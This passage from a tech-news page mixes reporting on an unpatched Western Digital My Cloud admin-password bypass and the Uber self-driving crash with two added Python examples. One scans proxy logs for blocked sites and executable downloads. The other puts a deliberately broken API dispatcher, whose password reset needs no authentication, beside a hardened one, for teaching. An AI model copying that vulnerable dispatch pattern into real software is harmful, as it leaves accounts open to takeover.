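The “regularly monitor employee web usage history” recommendation, as detection logic run over sample proxy lines. This is an added example, not the inspector general’s or USGS’s tooling; the lines follow the field order of Squid’s default native access.log but are constructed, as are the host names and the blocklist. A user is flagged either on a hit count over the threshold or on a download of executable-looking content from a blocked host, which is the path to malware the report describes.

```python
"""Find the users whose proxy traffic hits blocked categories, from sample log lines.

Added example for this article; it is not the inspector general's or USGS's tooling.
The lines follow the layout of Squid's default native access.log (time, elapsed,
client, result, bytes, method, URL, user, peer, content type) but are constructed,
as are the host names and the blocklist. Sites are matched by domain suffix, and a
user is flagged on a hit count over the threshold or on a download of
executable-looking content from a blocked host.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+(?P<bytes>\d+)"
    r"\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<user>\S+)\s+(?P<peer>\S+)\s+(?P<mime>\S+)$"
)
BLOCKLIST = {"adult-videos.example", "free-porn.example", "malware-cdn.example"}   # constructed
RISKY_MIME = {"application/x-msdownload", "application/x-dosexec",
              "application/octet-stream", "application/zip"}


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = int(rec["bytes"])
    return rec


def request_host(rec):
    """CONNECT lines carry host:port rather than a URL."""
    if rec["method"] == "CONNECT":
        return rec["url"].rsplit(":", 1)[0].lower()
    return (urlsplit(rec["url"]).hostname or "").lower()


def host_blocked(host):
    return any(host == d or host.endswith("." + d) for d in BLOCKLIST)


def analyze(lines, threshold=5):
    """Per-user summary of blocked traffic, and the subset worth an analyst's attention."""
    per_user = defaultdict(lambda: {"blocked_hits": 0, "blocked_hosts": set(), "risky_downloads": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host = request_host(rec)
        if not host_blocked(host):
            continue
        stats = per_user[rec["user"]]
        stats["blocked_hits"] += 1
        stats["blocked_hosts"].add(host)
        if rec["mime"] in RISKY_MIME:
            stats["risky_downloads"].append(rec["url"])
    flagged = {u: s for u, s in per_user.items()
               if s["blocked_hits"] >= threshold or s["risky_downloads"]}
    return dict(per_user), flagged


# Constructed lines in Squid native format; users and hosts are invented.
SAMPLE_LOG = """\
1539012345.123    245 10.20.30.40 TCP_MISS/200 48213 GET http://adult-videos.example/clip1.mp4 jdoe HIER_DIRECT/203.0.113.5 video/mp4
1539012350.001    120 10.20.30.40 TCP_MISS/200 9021 GET http://adult-videos.example/page2.html jdoe HIER_DIRECT/203.0.113.5 text/html
1539012360.410     88 10.20.30.40 TCP_MISS/200 7732 GET http://free-porn.example/index.html jdoe HIER_DIRECT/203.0.113.7 text/html
1539012365.500   1500 10.20.30.40 TCP_MISS/200 883112 GET http://malware-cdn.example/player_update.exe jdoe HIER_DIRECT/203.0.113.9 application/x-msdownload
1539012370.002     60 10.20.30.40 TCP_TUNNEL/200 4411 CONNECT cdn.free-porn.example:443 jdoe HIER_DIRECT/203.0.113.7 -
1539012380.250     40 10.20.30.40 TCP_MISS/200 5120 GET http://free-porn.example/gallery?page=3 jdoe HIER_DIRECT/203.0.113.7 text/html
1539012390.000    210 10.20.30.41 TCP_MISS/200 15023 GET http://intranet.usgs.example/timesheet asmith HIER_DIRECT/10.0.0.8 text/html
1539012395.777     95 10.20.30.41 TCP_MISS/200 3301 GET http://adult-videos.example/ asmith HIER_DIRECT/203.0.113.5 text/html
1539012400.123    300 10.20.30.42 TCP_MISS/200 120034 GET http://earthexplorer.usgs.example/scene/123 bjones HIER_DIRECT/10.0.0.9 image/tiff
"""

if __name__ == "__main__":
    _, flagged = analyze(SAMPLE_LOG.splitlines())
    for user, s in flagged.items():
        print(user, s["blocked_hits"], sorted(s["blocked_hosts"]), s["risky_downloads"])
```

The executable download is the line that matters for the incident in the report: a single hit on a blocked site is a policy question, while an `.exe` served from a blocked host is the moment to pull the laptop off the network. The threshold is deliberately separate so that one does not hide the other.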

Password bypass flaw in Western Digital My Cloud drives puts data at risk

A security researcher has published details of a vulnerability in a popular cloud storage drive after the company failed to issue security patches for over a year.

Remco Vermeulen found a privilege escalation bug in Western Digital’s My Cloud devices, which he said allows an attacker to bypass the admin password on the drive, gaining “complete control” over the user’s data.

The exploit works because the drive’s web-based dashboard doesn’t properly check a user’s credentials before giving a would-be attacker access to tools that should require a higher level of access.

The bug was “easy” to exploit, Vermeulen told TechCrunch in an email, and was remotely exploitable if a My Cloud device allows remote access over the internet — which thousands of devices do. He posted a proof-of-concept video on Twitter.
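The defect described here, and the Lenovo Watch X password reset earlier on this page, are the same missing step seen from two angles: the handler is reached before anyone has checked who is calling. The added example below is not Western Digital’s or Lenovo’s code and reproduces neither exploit; it shows a dispatcher that trusts its handlers beside one that gates every route. The routes, session scheme and in-memory user store are assumptions.

```python
"""A device dashboard API dispatched two ways: trusting the handler, or gating every route.

Added example for this article and for the Lenovo Watch X password-reset flaw
described earlier on this page; it is not Western Digital's or Lenovo's code and
does not reproduce either exploit. Routes, session format and the in-memory user
store are assumptions. In the vulnerable dispatcher each handler is supposed to
check credentials itself: the password-reset handler never does (anyone who knows
a username can change its password), and the admin tool only checks that some
session value was sent. The hardened dispatcher authenticates before any handler
runs, enforces the role the route declares, and ties account-scoped actions to
the caller's own session.
"""
import hashlib
import hmac
import os
import secrets

USERS = {}     # username -> {"salt": bytes, "hash": bytes, "role": "user" | "admin"}
SESSIONS = {}  # session token -> username


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def add_user(username, password, role="user"):
    salt = os.urandom(16)
    USERS[username] = {"salt": salt, "hash": _hash(password, salt), "role": role}


def login(username, password):
    """Returns a session token, or None for bad credentials."""
    user = USERS.get(username)
    if user and hmac.compare_digest(_hash(password, user["salt"]), user["hash"]):
        token = secrets.token_urlsafe(32)
        SESSIONS[token] = username
        return token
    return None


# Handlers return (status, message) like an HTTP response would.
def reset_password(caller, username, new_password):
    add_user(username, new_password, USERS[username]["role"])
    return 200, f"password for {username} changed"


def factory_reset_tool(caller):
    return 200, "device wiped"


def vulnerable_dispatch(path, session=None, **params):
    """Routes straight to handlers; the checks live (or do not live) inside them."""
    caller = SESSIONS.get(session)
    if path == "/api/reset_password":
        return reset_password(caller, **params)      # no check at all
    if path == "/api/admin/factory_reset":
        if session:                                   # presence of a value, not validity
            return factory_reset_tool(caller)
        return 403, "forbidden"
    return 404, "no such route"


# path -> (handler, role required, whether params["username"] must equal the caller)
ROUTES = {
    "/api/reset_password": (reset_password, "user", True),
    "/api/admin/factory_reset": (factory_reset_tool, "admin", False),
}


def hardened_dispatch(path, session=None, **params):
    """Deny by default: no handler runs until the session, role and ownership checks pass."""
    route = ROUTES.get(path)
    if route is None:
        return 404, "no such route"
    handler, required_role, account_scoped = route
    caller = SESSIONS.get(session)                    # unknown or absent token -> None
    if caller is None:
        return 401, "login required"
    if required_role == "admin" and USERS[caller]["role"] != "admin":
        return 403, "admin only"
    if account_scoped and params.get("username") != caller:
        return 403, "not your account"
    return handler(caller, **params)


if __name__ == "__main__":
    add_user("alice", "correct horse", role="admin")
    add_user("bob", "battery staple")
    print("vulnerable:", vulnerable_dispatch("/api/reset_password", username="bob", new_password="pwned"))
    print("hardened:  ", hardened_dispatch("/api/reset_password", username="bob", new_password="pwned"))
```

The point of the route table is that a handler which forgets its own check is still unreachable without a valid session, and an account-scoped handler cannot be pointed at someone else’s username. Remote access over the internet, as the article notes for My Cloud, turns any such forgotten check from a LAN problem into an internet-wide one.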

Details of the bug were also independently found by another security team, which released its own exploit code.

Vermeulen reported the bug over a year ago, in April 2017, but said the company stopped responding. Normally, security researchers give 90 days for a company to respond, in line with industry-accepted responsible disclosure guidelines.

After he found that WD had updated the My Cloud firmware in the meantime without fixing the vulnerability, he decided to post his findings.

A year later, WD still hasn’t released a patch.

The company confirmed that it knows of the vulnerability but did not say why it took more than a year to issue a fix. “We are in the process of finalizing a scheduled firmware update that will resolve the reported issue,” a spokesperson said, which will arrive “within a few weeks.”

WD said that several of its My Cloud products are vulnerable — including the EX2, EX4 and Mirror, but not My Cloud Home.

In the meantime, Vermeulen said that there’s no fix and that users have to “just disconnect” the drive altogether if they want to keep their data safe.

Video: The driver of the autonomous Uber was distracted before fatal crash

The Tempe, Arizona police department has released a video showing the moments before the fatal crash involving Uber’s self-driving car. The video includes the view of the street from the Uber and a view of the safety driver behind the wheel of the autonomous vehicle.

Warning: This video is disturbing.

Tempe Police Vehicular Crimes Unit is actively investigating the details of this incident that occurred on March 18th. We will provide updated information regarding the investigation once it is available. pic.twitter.com/2dVP72TziQ

— Tempe Police (@TempePolice) March 21, 2018

The video shows the victim crossing a dark street when an Uber self-driving Volvo XC90 strikes her at 40 mph. It also shows the safety driver, who is supposed to be monitoring the autonomous vehicle, looking down moments before the crash. It’s unclear what distracted the driver. It’s also unclear why Uber’s systems did not detect and react to the victim, who was clearly moving across the range of its sensors at walking speed.

Uber provided the following statement regarding the incident to TechCrunch:

Our hearts go out to the victim’s family. We are fully cooperating with local authorities in their investigation of this incident.

Since the crash on March 18, Uber has pulled all of its self-driving vehicles from the roads in Pittsburgh, Tempe, San Francisco and Toronto. This is the first time an autonomous vehicle operating in self-driving mode has resulted in a human death. In a statement to TechCrunch, the NHTSA said it has sent its “Special Crash Investigation” team to Tempe. This is “consistent with NHTSA’s vigilant oversight and authority over the safety of all motor vehicles and equipment, including automated technologies,” a spokesperson for the agency told TechCrunch.

“NHTSA is also in contact with Uber, Volvo, Federal, State and local authorities regarding the incident,” the spokesperson said. “The agency will review the information and proceed as warranted.”

Toyota also paused its self-driving testing in the US following the accident.

This tragic accident is the sort of situation self-driving vehicles are supposed to address. After all, these systems are supposed to be able to see through the dark and cannot get distracted by Twitter.
